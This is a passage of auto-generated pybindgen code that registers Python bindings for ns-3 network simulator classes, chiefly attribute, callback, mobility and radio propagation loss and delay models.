## attribute.h (module 'core'): bool ns3::AttributeAccessor::HasGetter() const [member function]
cls.add_method('HasGetter',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeAccessor::HasSetter() const [member function]
cls.add_method('HasSetter',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeAccessor::Set(ns3::ObjectBase * object, ns3::AttributeValue const & value) const [member function]
cls.add_method('Set',
'bool',
[param('ns3::ObjectBase *', 'object', transfer_ownership=False), param('ns3::AttributeValue const &', 'value')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3AttributeChecker_methods(root_module, cls):
## attribute.h (module 'core'): ns3::AttributeChecker::AttributeChecker(ns3::AttributeChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeChecker const &', 'arg0')])
## attribute.h (module 'core'): ns3::AttributeChecker::AttributeChecker() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): bool ns3::AttributeChecker::Check(ns3::AttributeValue const & value) const [member function]
cls.add_method('Check',
'bool',
[param('ns3::AttributeValue const &', 'value')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeChecker::Copy(ns3::AttributeValue const & source, ns3::AttributeValue & destination) const [member function]
cls.add_method('Copy',
'bool',
[param('ns3::AttributeValue const &', 'source'), param('ns3::AttributeValue &', 'destination')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeChecker::Create() const [member function]
cls.add_method('Create',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeChecker::CreateValidValue(ns3::AttributeValue const & value) const [member function]
cls.add_method('CreateValidValue',
'ns3::Ptr< ns3::AttributeValue >',
[param('ns3::AttributeValue const &', 'value')],
is_const=True)
## attribute.h (module 'core'): std::string ns3::AttributeChecker::GetUnderlyingTypeInformation() const [member function]
cls.add_method('GetUnderlyingTypeInformation',
'std::string',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): std::string ns3::AttributeChecker::GetValueTypeName() const [member function]
cls.add_method('GetValueTypeName',
'std::string',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeChecker::HasUnderlyingTypeInformation() const [member function]
cls.add_method('HasUnderlyingTypeInformation',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3AttributeValue_methods(root_module, cls):
## attribute.h (module 'core'): ns3::AttributeValue::AttributeValue(ns3::AttributeValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeValue const &', 'arg0')])
## attribute.h (module 'core'): ns3::AttributeValue::AttributeValue() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_pure_virtual=True, is_virtual=True)
## attribute.h (module 'core'): std::string ns3::AttributeValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3CallbackChecker_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackChecker::CallbackChecker() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::CallbackChecker::CallbackChecker(ns3::CallbackChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackChecker const &', 'arg0')])
return
def register_Ns3CallbackImplBase_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackImplBase::CallbackImplBase() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::CallbackImplBase::CallbackImplBase(ns3::CallbackImplBase const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackImplBase const &', 'arg0')])
## callback.h (module 'core'): bool ns3::CallbackImplBase::IsEqual(ns3::Ptr<ns3::CallbackImplBase const> other) const [member function]
cls.add_method('IsEqual',
'bool',
[param('ns3::Ptr< ns3::CallbackImplBase const >', 'other')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3CallbackValue_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackValue::CallbackValue(ns3::CallbackValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackValue const &', 'arg0')])
## callback.h (module 'core'): ns3::CallbackValue::CallbackValue() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::CallbackValue::CallbackValue(ns3::CallbackBase const & base) [constructor]
cls.add_constructor([param('ns3::CallbackBase const &', 'base')])
## callback.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::CallbackValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## callback.h (module 'core'): bool ns3::CallbackValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## callback.h (module 'core'): std::string ns3::CallbackValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## callback.h (module 'core'): void ns3::CallbackValue::Set(ns3::CallbackBase base) [member function]
cls.add_method('Set',
'void',
[param('ns3::CallbackBase', 'base')])
return
def register_Ns3ConstantSpeedPropagationDelayModel_methods(root_module, cls):
## propagation-delay-model.h (module 'propagation'): ns3::ConstantSpeedPropagationDelayModel::ConstantSpeedPropagationDelayModel(ns3::ConstantSpeedPropagationDelayModel const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ConstantSpeedPropagationDelayModel const &', 'arg0')])
## propagation-delay-model.h (module 'propagation'): ns3::ConstantSpeedPropagationDelayModel::ConstantSpeedPropagationDelayModel() [constructor]
cls.add_constructor([])
## propagation-delay-model.h (module 'propagation'): ns3::Time ns3::ConstantSpeedPropagationDelayModel::GetDelay(ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function]
cls.add_method('GetDelay',
'ns3::Time',
[param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')],
is_const=True, is_virtual=True)
## propagation-delay-model.h (module 'propagation'): double ns3::ConstantSpeedPropagationDelayModel::GetSpeed() const [member function]
cls.add_method('GetSpeed',
'double',
[],
is_const=True)
## propagation-delay-model.h (module 'propagation'): static ns3::TypeId ns3::ConstantSpeedPropagationDelayModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## propagation-delay-model.h (module 'propagation'): void ns3::ConstantSpeedPropagationDelayModel::SetSpeed(double speed) [member function]
cls.add_method('SetSpeed',
'void',
[param('double', 'speed')])
return
def register_Ns3Cost231PropagationLossModel_methods(root_module, cls):
## cost231-propagation-loss-model.h (module 'propagation'): static ns3::TypeId ns3::Cost231PropagationLossModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## cost231-propagation-loss-model.h (module 'propagation'): ns3::Cost231PropagationLossModel::Cost231PropagationLossModel() [constructor]
cls.add_constructor([])
## cost231-propagation-loss-model.h (module 'propagation'): double ns3::Cost231PropagationLossModel::GetLoss(ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function]
cls.add_method('GetLoss',
'double',
[param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')],
is_const=True)
## cost231-propagation-loss-model.h (module 'propagation'): void ns3::Cost231PropagationLossModel::SetBSAntennaHeight(double height) [member function]
cls.add_method('SetBSAntennaHeight',
'void',
[param('double', 'height')])
## cost231-propagation-loss-model.h (module 'propagation'): void ns3::Cost231PropagationLossModel::SetSSAntennaHeight(double height) [member function]
cls.add_method('SetSSAntennaHeight',
'void',
[param('double', 'height')])
## cost231-propagation-loss-model.h (module 'propagation'): void ns3::Cost231PropagationLossModel::SetEnvironment(ns3::Cost231PropagationLossModel::Environment env) [member function]
cls.add_method('SetEnvironment',
'void',
[param('ns3::Cost231PropagationLossModel::Environment', 'env')])
## cost231-propagation-loss-model.h (module 'propagation'): void ns3::Cost231PropagationLossModel::SetLambda(double lambda) [member function]
cls.add_method('SetLambda',
'void',
[param('double', 'lambda')])
## cost231-propagation-loss-model.h (module 'propagation'): void ns3::Cost231PropagationLossModel::SetMinDistance(double minDistance) [member function]
cls.add_method('SetMinDistance',
'void',
[param('double', 'minDistance')])
## cost231-propagation-loss-model.h (module 'propagation'): double ns3::Cost231PropagationLossModel::GetBSAntennaHeight() const [member function]
cls.add_method('GetBSAntennaHeight',
'double',
[],
is_const=True)
## cost231-propagation-loss-model.h (module 'propagation'): double ns3::Cost231PropagationLossModel::GetSSAntennaHeight() const [member function]
cls.add_method('GetSSAntennaHeight',
'double',
[],
is_const=True)
## cost231-propagation-loss-model.h (module 'propagation'): ns3::Cost231PropagationLossModel::Environment ns3::Cost231PropagationLossModel::GetEnvironment() const [member function]
cls.add_method('GetEnvironment',
'ns3::Cost231PropagationLossModel::Environment',
[],
is_const=True)
## cost231-propagation-loss-model.h (module 'propagation'): double ns3::Cost231PropagationLossModel::GetMinDistance() const [member function]
cls.add_method('GetMinDistance',
'double',
[],
is_const=True)
## cost231-propagation-loss-model.h (module 'propagation'): double ns3::Cost231PropagationLossModel::GetLambda() const [member function]
cls.add_method('GetLambda',
'double',
[],
is_const=True)
## cost231-propagation-loss-model.h (module 'propagation'): void ns3::Cost231PropagationLossModel::SetLambda(double frequency, double speed) [member function]
cls.add_method('SetLambda',
'void',
[param('double', 'frequency'), param('double', 'speed')])
## cost231-propagation-loss-model.h (module 'propagation'): double ns3::Cost231PropagationLossModel::GetShadowing() [member function]
cls.add_method('GetShadowing',
'double',
[])
## cost231-propagation-loss-model.h (module 'propagation'): void ns3::Cost231PropagationLossModel::SetShadowing(double shadowing) [member function]
cls.add_method('SetShadowing',
'void',
[param('double', 'shadowing')])
## cost231-propagation-loss-model.h (module 'propagation'): double ns3::Cost231PropagationLossModel::DoCalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function]
cls.add_method('DoCalcRxPower',
'double',
[param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')],
is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3EmptyAttributeValue_methods(root_module, cls):
## attribute.h (module 'core'): ns3::EmptyAttributeValue::EmptyAttributeValue(ns3::EmptyAttributeValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::EmptyAttributeValue const &', 'arg0')])
## attribute.h (module 'core'): ns3::EmptyAttributeValue::EmptyAttributeValue() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::EmptyAttributeValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, visibility='private', is_virtual=True)
## attribute.h (module 'core'): bool ns3::EmptyAttributeValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
visibility='private', is_virtual=True)
## attribute.h (module 'core'): std::string ns3::EmptyAttributeValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3FixedRssLossModel_methods(root_module, cls):
## propagation-loss-model.h (module 'propagation'): static ns3::TypeId ns3::FixedRssLossModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## propagation-loss-model.h (module 'propagation'): ns3::FixedRssLossModel::FixedRssLossModel() [constructor]
cls.add_constructor([])
## propagation-loss-model.h (module 'propagation'): void ns3::FixedRssLossModel::SetRss(double rss) [member function]
cls.add_method('SetRss',
'void',
[param('double', 'rss')])
## propagation-loss-model.h (module 'propagation'): double ns3::FixedRssLossModel::DoCalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function]
cls.add_method('DoCalcRxPower',
'double',
[param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')],
is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3FriisPropagationLossModel_methods(root_module, cls):
## propagation-loss-model.h (module 'propagation'): static ns3::TypeId ns3::FriisPropagationLossModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## propagation-loss-model.h (module 'propagation'): ns3::FriisPropagationLossModel::FriisPropagationLossModel() [constructor]
cls.add_constructor([])
## propagation-loss-model.h (module 'propagation'): void ns3::FriisPropagationLossModel::SetLambda(double frequency, double speed) [member function]
cls.add_method('SetLambda',
'void',
[param('double', 'frequency'), param('double', 'speed')])
## propagation-loss-model.h (module 'propagation'): void ns3::FriisPropagationLossModel::SetLambda(double lambda) [member function]
cls.add_method('SetLambda',
'void',
[param('double', 'lambda')])
## propagation-loss-model.h (module 'propagation'): void ns3::FriisPropagationLossModel::SetSystemLoss(double systemLoss) [member function]
cls.add_method('SetSystemLoss',
'void',
[param('double', 'systemLoss')])
## propagation-loss-model.h (module 'propagation'): void ns3::FriisPropagationLossModel::SetMinDistance(double minDistance) [member function]
cls.add_method('SetMinDistance',
'void',
[param('double', 'minDistance')])
## propagation-loss-model.h (module 'propagation'): double ns3::FriisPropagationLossModel::GetMinDistance() const [member function]
cls.add_method('GetMinDistance',
'double',
[],
is_const=True)
## propagation-loss-model.h (module 'propagation'): double ns3::FriisPropagationLossModel::GetLambda() const [member function]
cls.add_method('GetLambda',
'double',
[],
is_const=True)
## propagation-loss-model.h (module 'propagation'): double ns3::FriisPropagationLossModel::GetSystemLoss() const [member function]
cls.add_method('GetSystemLoss',
'double',
[],
is_const=True)
## propagation-loss-model.h (module 'propagation'): double ns3::FriisPropagationLossModel::DoCalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function]
cls.add_method('DoCalcRxPower',
'double',
[param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')],
is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3ItuR1411LosPropagationLossModel_methods(root_module, cls):
## itu-r-1411-los-propagation-loss-model.h (module 'propagation'): ns3::ItuR1411LosPropagationLossModel::ItuR1411LosPropagationLossModel() [constructor]
cls.add_constructor([])
## itu-r-1411-los-propagation-loss-model.h (module 'propagation'): static ns3::TypeId ns3::ItuR1411LosPropagationLossModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## itu-r-1411-los-propagation-loss-model.h (module 'propagation'): void ns3::ItuR1411LosPropagationLossModel::SetFrequency(double freq) [member function]
cls.add_method('SetFrequency',
'void',
[param('double', 'freq')])
## itu-r-1411-los-propagation-loss-model.h (module 'propagation'): double ns3::ItuR1411LosPropagationLossModel::GetLoss(ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function]
cls.add_method('GetLoss',
'double',
[param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')],
is_const=True)
## itu-r-1411-los-propagation-loss-model.h (module 'propagation'): double ns3::ItuR1411LosPropagationLossModel::DoCalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function]
cls.add_method('DoCalcRxPower',
'double',
[param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')],
is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3ItuR1411NlosOverRooftopPropagationLossModel_methods(root_module, cls):
## itu-r-1411-nlos-over-rooftop-propagation-loss-model.h (module 'propagation'): ns3::ItuR1411NlosOverRooftopPropagationLossModel::ItuR1411NlosOverRooftopPropagationLossModel() [constructor]
cls.add_constructor([])
## itu-r-1411-nlos-over-rooftop-propagation-loss-model.h (module 'propagation'): static ns3::TypeId ns3::ItuR1411NlosOverRooftopPropagationLossModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## itu-r-1411-nlos-over-rooftop-propagation-loss-model.h (module 'propagation'): void ns3::ItuR1411NlosOverRooftopPropagationLossModel::SetFrequency(double freq) [member function]
cls.add_method('SetFrequency',
'void',
[param('double', 'freq')])
## itu-r-1411-nlos-over-rooftop-propagation-loss-model.h (module 'propagation'): double ns3::ItuR1411NlosOverRooftopPropagationLossModel::GetLoss(ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function]
cls.add_method('GetLoss',
'double',
[param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')],
is_const=True)
## itu-r-1411-nlos-over-rooftop-propagation-loss-model.h (module 'propagation'): double ns3::ItuR1411NlosOverRooftopPropagationLossModel::DoCalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function]
cls.add_method('DoCalcRxPower',
'double',
[param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')],
is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3JakesProcess_methods(root_module, cls):
## jakes-process.h (module 'propagation'): ns3::JakesProcess::JakesProcess(ns3::JakesProcess const & arg0) [copy constructor]
cls.add_constructor([param('ns3::JakesProcess const &', 'arg0')])
## jakes-process.h (module 'propagation'): ns3::JakesProcess::JakesProcess() [constructor]
cls.add_constructor([])
## jakes-process.h (module 'propagation'): double ns3::JakesProcess::GetChannelGainDb() const [member function]
cls.add_method('GetChannelGainDb',
'double',
[],
is_const=True)
## jakes-process.h (module 'propagation'): std::complex<double> ns3::JakesProcess::GetComplexGain() const [member function]
cls.add_method('GetComplexGain',
'std::complex< double >',
[],
is_const=True)
## jakes-process.h (module 'propagation'): static ns3::TypeId ns3::JakesProcess::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
return
def register_Ns3JakesPropagationLossModel_methods(root_module, cls):
## jakes-propagation-loss-model.h (module 'propagation'): static ns3::TypeId ns3::JakesPropagationLossModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## jakes-propagation-loss-model.h (module 'propagation'): ns3::JakesPropagationLossModel::JakesPropagationLossModel() [constructor]
cls.add_constructor([])
## jakes-propagation-loss-model.h (module 'propagation'): double ns3::JakesPropagationLossModel::DoCalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function]
cls.add_method('DoCalcRxPower',
'double',
[param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')],
is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3Kun2600MhzPropagationLossModel_methods(root_module, cls):
## kun-2600-mhz-propagation-loss-model.h (module 'propagation'): ns3::Kun2600MhzPropagationLossModel::Kun2600MhzPropagationLossModel() [constructor]
cls.add_constructor([])
## kun-2600-mhz-propagation-loss-model.h (module 'propagation'): static ns3::TypeId ns3::Kun2600MhzPropagationLossModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## kun-2600-mhz-propagation-loss-model.h (module 'propagation'): double ns3::Kun2600MhzPropagationLossModel::GetLoss(ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function]
cls.add_method('GetLoss',
'double',
[param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')],
is_const=True)
## kun-2600-mhz-propagation-loss-model.h (module 'propagation'): double ns3::Kun2600MhzPropagationLossModel::DoCalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function]
cls.add_method('DoCalcRxPower',
'double',
[param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')],
is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3LogDistancePropagationLossModel_methods(root_module, cls):
## propagation-loss-model.h (module 'propagation'): static ns3::TypeId ns3::LogDistancePropagationLossModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## propagation-loss-model.h (module 'propagation'): ns3::LogDistancePropagationLossModel::LogDistancePropagationLossModel() [constructor]
cls.add_constructor([])
## propagation-loss-model.h (module 'propagation'): void ns3::LogDistancePropagationLossModel::SetPathLossExponent(double n) [member function]
cls.add_method('SetPathLossExponent',
'void',
[param('double', 'n')])
## propagation-loss-model.h (module 'propagation'): double ns3::LogDistancePropagationLossModel::GetPathLossExponent() const [member function]
cls.add_method('GetPathLossExponent',
'double',
[],
is_const=True)
## propagation-loss-model.h (module 'propagation'): void ns3::LogDistancePropagationLossModel::SetReference(double referenceDistance, double referenceLoss) [member function]
cls.add_method('SetReference',
'void',
[param('double', 'referenceDistance'), param('double', 'referenceLoss')])
## propagation-loss-model.h (module 'propagation'): double ns3::LogDistancePropagationLossModel::DoCalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function]
cls.add_method('DoCalcRxPower',
'double',
[param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')],
is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3MatrixPropagationLossModel_methods(root_module, cls):
## propagation-loss-model.h (module 'propagation'): static ns3::TypeId ns3::MatrixPropagationLossModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## propagation-loss-model.h (module 'propagation'): ns3::MatrixPropagationLossModel::MatrixPropagationLossModel() [constructor]
cls.add_constructor([])
## propagation-loss-model.h (module 'propagation'): void ns3::MatrixPropagationLossModel::SetLoss(ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b, double loss, bool symmetric=true) [member function]
cls.add_method('SetLoss',
'void',
[param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b'), param('double', 'loss'), param('bool', 'symmetric', default_value='true')])
## propagation-loss-model.h (module 'propagation'): void ns3::MatrixPropagationLossModel::SetDefaultLoss(double arg0) [member function]
cls.add_method('SetDefaultLoss',
'void',
[param('double', 'arg0')])
## propagation-loss-model.h (module 'propagation'): double ns3::MatrixPropagationLossModel::DoCalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function]
cls.add_method('DoCalcRxPower',
'double',
[param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')],
is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3MobilityModel_methods(root_module, cls):
## mobility-model.h (module 'mobility'): ns3::MobilityModel::MobilityModel(ns3::MobilityModel const & arg0) [copy constructor]
cls.add_constructor([param('ns3::MobilityModel const &', 'arg0')])
## mobility-model.h (module 'mobility'): ns3::MobilityModel::MobilityModel() [constructor]
cls.add_constructor([])
## mobility-model.h (module 'mobility'): double ns3::MobilityModel::GetDistanceFrom(ns3::Ptr<ns3::MobilityModel const> position) const [member function]
cls.add_method('GetDistanceFrom',
'double',
[param('ns3::Ptr< ns3::MobilityModel const >', 'position')],
is_const=True)
## mobility-model.h (module 'mobility'): ns3::Vector ns3::MobilityModel::GetPosition() const [member function]
cls.add_method('GetPosition',
'ns3::Vector',
[],
is_const=True)
## mobility-model.h (module 'mobility'): double ns3::MobilityModel::GetRelativeSpeed(ns3::Ptr<ns3::MobilityModel const> other) const [member function]
cls.add_method('GetRelativeSpeed',
'double',
[param('ns3::Ptr< ns3::MobilityModel const >', 'other')],
is_const=True)
## mobility-model.h (module 'mobility'): static ns3::TypeId ns3::MobilityModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## mobility-model.h (module 'mobility'): ns3::Vector ns3::MobilityModel::GetVelocity() const [member function]
cls.add_method('GetVelocity',
'ns3::Vector',
[],
is_const=True)
## mobility-model.h (module 'mobility'): void ns3::MobilityModel::SetPosition(ns3::Vector const & position) [member function]
cls.add_method('SetPosition',
'void',
[param('ns3::Vector const &', 'position')])
## mobility-model.h (module 'mobility'): void ns3::MobilityModel::NotifyCourseChange() const [member function]
cls.add_method('NotifyCourseChange',
'void',
[],
is_const=True, visibility='protected')
## mobility-model.h (module 'mobility'): ns3::Vector ns3::MobilityModel::DoGetPosition() const [member function]
cls.add_method('DoGetPosition',
'ns3::Vector',
[],
is_pure_virtual=True, is_const=True, visibility='private', is_virtual=True)
## mobility-model.h (module 'mobility'): ns3::Vector ns3::MobilityModel::DoGetVelocity() const [member function]
cls.add_method('DoGetVelocity',
'ns3::Vector',
[],
is_pure_virtual=True, is_const=True, visibility='private', is_virtual=True)
## mobility-model.h (module 'mobility'): void ns3::MobilityModel::DoSetPosition(ns3::Vector const & position) [member function]
cls.add_method('DoSetPosition',
'void',
[param('ns3::Vector const &', 'position')],
is_pure_virtual=True, visibility='private', is_virtual=True)
return
def register_Ns3NakagamiPropagationLossModel_methods(root_module, cls):
## propagation-loss-model.h (module 'propagation'): static ns3::TypeId ns3::NakagamiPropagationLossModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## propagation-loss-model.h (module 'propagation'): ns3::NakagamiPropagationLossModel::NakagamiPropagationLossModel() [constructor]
cls.add_constructor([])
## propagation-loss-model.h (module 'propagation'): double ns3::NakagamiPropagationLossModel::DoCalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function]
cls.add_method('DoCalcRxPower',
'double',
[param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')],
is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3OkumuraHataPropagationLossModel_methods(root_module, cls):
## okumura-hata-propagation-loss-model.h (module 'propagation'): ns3::OkumuraHataPropagationLossModel::OkumuraHataPropagationLossModel() [constructor]
cls.add_constructor([])
## okumura-hata-propagation-loss-model.h (module 'propagation'): static ns3::TypeId ns3::OkumuraHataPropagationLossModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## okumura-hata-propagation-loss-model.h (module 'propagation'): double ns3::OkumuraHataPropagationLossModel::GetLoss(ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function]
cls.add_method('GetLoss',
'double',
[param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')],
is_const=True)
## okumura-hata-propagation-loss-model.h (module 'propagation'): double ns3::OkumuraHataPropagationLossModel::DoCalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function]
cls.add_method('DoCalcRxPower',
'double',
[param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')],
is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3RandomVariableChecker_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::RandomVariableChecker::RandomVariableChecker() [constructor]
cls.add_constructor([])
## random-variable.h (module 'core'): ns3::RandomVariableChecker::RandomVariableChecker(ns3::RandomVariableChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::RandomVariableChecker const &', 'arg0')])
return
def register_Ns3RandomVariableValue_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::RandomVariableValue::RandomVariableValue() [constructor]
cls.add_constructor([])
## random-variable.h (module 'core'): ns3::RandomVariableValue::RandomVariableValue(ns3::RandomVariableValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::RandomVariableValue const &', 'arg0')])
